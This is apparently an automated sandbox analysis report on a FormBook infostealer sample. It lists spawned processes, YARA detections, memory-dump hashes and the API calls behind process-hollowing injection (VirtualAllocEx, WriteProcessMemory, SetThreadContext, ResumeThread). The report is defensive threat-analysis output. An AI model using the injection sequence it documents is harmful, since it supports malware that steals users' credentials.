                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:9
                Start time:02:53:05
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\unregmp2.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\unregmp2.exe"
                Imagebase:0xf70000
                File size:214'528 bytes
                MD5 hash:51629AAAF753C6411D0B7D37620B7A83
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                Target ID:13
                Start time:02:53:18
                Start date:03/07/2024
                Path:C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe"
                Imagebase:0xe10000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:14
                Start time:02:53:30
                Start date:03/07/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff73feb0000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                  Execution Graph

                  Execution Coverage:10.9%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:215
                  Total number of Limit Nodes:9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8736ceab1e4f6e9a89e6476619339510bdd85ed6aaa29b817ea09eb08a72213
                  • Instruction ID: 13c50f6224c7a2d88dbbc3c6145387838ffe0182257bb39519cb10697d506262
                  • Opcode Fuzzy Hash: f8736ceab1e4f6e9a89e6476619339510bdd85ed6aaa29b817ea09eb08a72213
                  • Instruction Fuzzy Hash: 742128B1D056188BEB18CFAAD9143DEFFF6BFC9300F04C06AD408A6264EB7409458F60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5deb51970e43b1d2ca3adf93a6b1159908b4f653c7f2042f7b38ade67ce974b
                  • Instruction ID: 1c24a81cd3a895a7284e3221c0e24119e65dc0c194f12ee6ee9215c568690f9b
                  • Opcode Fuzzy Hash: d5deb51970e43b1d2ca3adf93a6b1159908b4f653c7f2042f7b38ade67ce974b
                  • Instruction Fuzzy Hash: 2E21E3B1D156188BEB18CFABC9553DEFAF6BFC9300F04C02AD40866264EB7509458F90

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 011DCFFE
                  • GetCurrentThread.KERNEL32 ref: 011DD03B
                  • GetCurrentProcess.KERNEL32 ref: 011DD078
                  • GetCurrentThreadId.KERNEL32 ref: 011DD0D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: 09da695ce705d7d4db2da312a344078ac5d1fd7c73fe007d1b74a72badceed5d
                  • Instruction ID: 4c6ba27685a46a87045948bd22f61e3db55e850a0139a6303410f317f393dcaf
                  • Opcode Fuzzy Hash: 09da695ce705d7d4db2da312a344078ac5d1fd7c73fe007d1b74a72badceed5d
                  • Instruction Fuzzy Hash: CC6155B09012099FDB58DFA9E548BDEBBF1FF88314F20846AE409A73A0D7349945CB65

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 011DCFFE
                  • GetCurrentThread.KERNEL32 ref: 011DD03B
                  • GetCurrentProcess.KERNEL32 ref: 011DD078
                  • GetCurrentThreadId.KERNEL32 ref: 011DD0D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0

                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 075D7326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0

                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 075D7326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0

                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 011DAF3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0

                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 011D59A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0

                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 011D59A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0

                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075D6EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0

                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075D6EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0

                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075D6D4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0

                  APIs
                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 075D6FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0

                  APIs
                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 075D6FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0

                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075D6D4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0

                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD657
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD657
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 075D6E16
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,011DAFB9,00000800,00000000,00000000), ref: 011DB1CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,011DAFB9,00000800,00000000,00000000), ref: 011DB1CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 075D6E16
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 011DAF3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 075D9E0D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 075D9E0D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                  • Instruction ID: f8edd68e665c637818ca9c690d5e60e942375af728f82a28a9e55f0905f0cddf
                  • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                  • Instruction Fuzzy Hash: 7411AF76504284CFDF16CF54E5C4B16BF72FB84328F24C6A9D8490B656C336D456CBA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction ID: 671093fd41ba5c024a0b59162ed22c8804cac5fbbb148a493994f1068566ef5b
                  • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction Fuzzy Hash: F911BB75504280DFDB16DF54D5C4B15BBA2FB84324F24C6AAE8494B296C33AD40ACF62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325964081.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction ID: 4bf2dd7a2339470c173d41f1d4b69c1c355efdeadc9e32aa8d2287e3f35cd9d0
                  • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                  • Instruction Fuzzy Hash: AC11BB75508380CFDB16DF54E5C4B16BBA2FB84314F24C6AAD8494B696C33AD40BCFA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 63881e36ff48c50eede2f51ba9bc6c5ba42c79b2f1347b61be4e5ac71ca7edaa
                  • Instruction ID: 915e23e2ec49206f5a9551a0aa29973059f94c0aeda4e9aceab572f5224ad181
                  • Opcode Fuzzy Hash: 63881e36ff48c50eede2f51ba9bc6c5ba42c79b2f1347b61be4e5ac71ca7edaa
                  • Instruction Fuzzy Hash: 2801A7711047889FEB284AA9EC84766FBE8DF41238F18C45AED190A386C3799440CAB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1325836132.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_117d000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7f015e86ecef6377e476220b024d56c3c47d56cceeca6610fe87c524a725453f
                  • Instruction ID: d4a33ebb29fcb0440bd6191ca6504414a492514029d8fd0e4a3b2147de9ac518
                  • Opcode Fuzzy Hash: 7f015e86ecef6377e476220b024d56c3c47d56cceeca6610fe87c524a725453f
                  • Instruction Fuzzy Hash: 91F062714047849EEB248A5ADC84B62FFA8EF41638F18C45AED584E387C3799844CBB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: bQ_>
                  • API String ID: 0-559413283
                  • Opcode ID: 98cdc9f09a49b01557d89690181195e6097a22391031a2b6600fc8e80ec3ee28
                  • Instruction ID: 959d4009230412087d9dccce4f0a001eac3627454b9196c804e09508a58d45e3
                  • Opcode Fuzzy Hash: 98cdc9f09a49b01557d89690181195e6097a22391031a2b6600fc8e80ec3ee28
                  • Instruction Fuzzy Hash: 5EE1E9B4E002198FDB14DFA9C590AAEBBF2FF89304F248169D854AB355D731AD42CF61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e4b987606d4a61a62b55bceb76fd16aa46aacd64e52998bfa4ddb4fd1745367
                  • Instruction ID: 77f836ab40ae71f46a1c8068ed54c4685f1d91b1d674e34c7f38f2026d9f03bc
                  • Opcode Fuzzy Hash: 6e4b987606d4a61a62b55bceb76fd16aa46aacd64e52998bfa4ddb4fd1745367
                  • Instruction Fuzzy Hash: 71D158B17016068FDB29DB79C450BAFB7EAAFC9600F14846ED1469B2A0DB35ED02CB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d66b46d65ad7c025ba7134167006a4bc3e4a87189b37f524cd99decba3f5f82
                  • Instruction ID: 6cc90b870a0980157298501f491a85b8db1a9b9ec4565df7d71266e943b8a7e3
                  • Opcode Fuzzy Hash: 7d66b46d65ad7c025ba7134167006a4bc3e4a87189b37f524cd99decba3f5f82
                  • Instruction Fuzzy Hash: E0E1FAB4E002198FDB14DFA9C590AAEBBF2FF89304F248159D415AB355D771AD42CF60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d95118c15ddf8fe37aefa20e8d6e81a8e715622e052650b8b6984a28d6080b3d
                  • Instruction ID: 657b2c2e0c016d600f8c9d7cc34f0c885266ca143698e6642cc5d29968a17fe6
                  • Opcode Fuzzy Hash: d95118c15ddf8fe37aefa20e8d6e81a8e715622e052650b8b6984a28d6080b3d
                  • Instruction Fuzzy Hash: ACE1E8B4E002198FDB14DFA9C590AAEBBF2FF89305F24816AD814AB355D731AD41CF61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fdf22801c7ff6b08cdecc13afde10e5f9ef9601514a5d72375cf2766ee2e26bd
                  • Instruction ID: 786fd392df1f2ef95053695d6749789395469a0b3066c4d1ac717be414a09ed6
                  • Opcode Fuzzy Hash: fdf22801c7ff6b08cdecc13afde10e5f9ef9601514a5d72375cf2766ee2e26bd
                  • Instruction Fuzzy Hash: 80E1D7B4E002598FDB14DFA9C590AAEBBF2FF89304F24856AD814AB355D731AD41CF60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6f7533a628a3245c93747dc250a53ac497d54c0773a814bdadf5954de2c131d5
                  • Instruction ID: e5d852c3d3040059c14c5707556e21506b04aebeb4667092aa94e3addef56965
                  • Opcode Fuzzy Hash: 6f7533a628a3245c93747dc250a53ac497d54c0773a814bdadf5954de2c131d5
                  • Instruction Fuzzy Hash: B9E1F8B4E002598FDB14DFA9C580AAEBBF2FF89304F24816AD815AB355D731AD41CF61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d630ffb7e87bbff083671a04f63abc2d3199dd7251d433c90d548a5952b726e3
                  • Instruction ID: e03738d30eabd367499d2af32f93db62e037f4d2b743a9230239fc452926b02e
                  • Opcode Fuzzy Hash: d630ffb7e87bbff083671a04f63abc2d3199dd7251d433c90d548a5952b726e3
                  • Instruction Fuzzy Hash: 43A17236E0061A8FCF19DFB4D8445DEB7B2FF85304B15856AE906AB255DB31DA07CB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dfd723613fc537a73539a44888895987185c3174ad41cdfa5ef93cef457bf44
                  • Instruction ID: 955b96845e7c15324fc1ed4b6e78a61d3d62ec517b9528f200ef731f0676fa61
                  • Opcode Fuzzy Hash: 4dfd723613fc537a73539a44888895987185c3174ad41cdfa5ef93cef457bf44
                  • Instruction Fuzzy Hash: 8B51F6B4E002598FDB14DFA9C5845AEBBF2FF89304F24816AD818AB256D7319941CFA1

                  Execution Graph

                  Execution Coverage:1.1%
                  Dynamic/Decrypted Code Coverage:5.3%
                  Signature Coverage:8.4%
                  Total number of Nodes:131
                  Total number of Limit Nodes:7

                  Control-flow Graph

                  control_flow_graph 101 417893-4178bc call 42e053 104 4178c2-4178d0 call 42e573 101->104 105 4178be-4178c1 101->105 108 4178e0-4178f1 call 42ca13 104->108 109 4178d2-4178dd call 42e813 104->109 114 4178f3-417907 LdrLoadDll 108->114 115 41790a-41790d 108->115 109->108 114->115
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417905
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0

                  Control-flow Graph

                  control_flow_graph 122 42b463-42b49f call 404923 call 42c523 NtClose
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
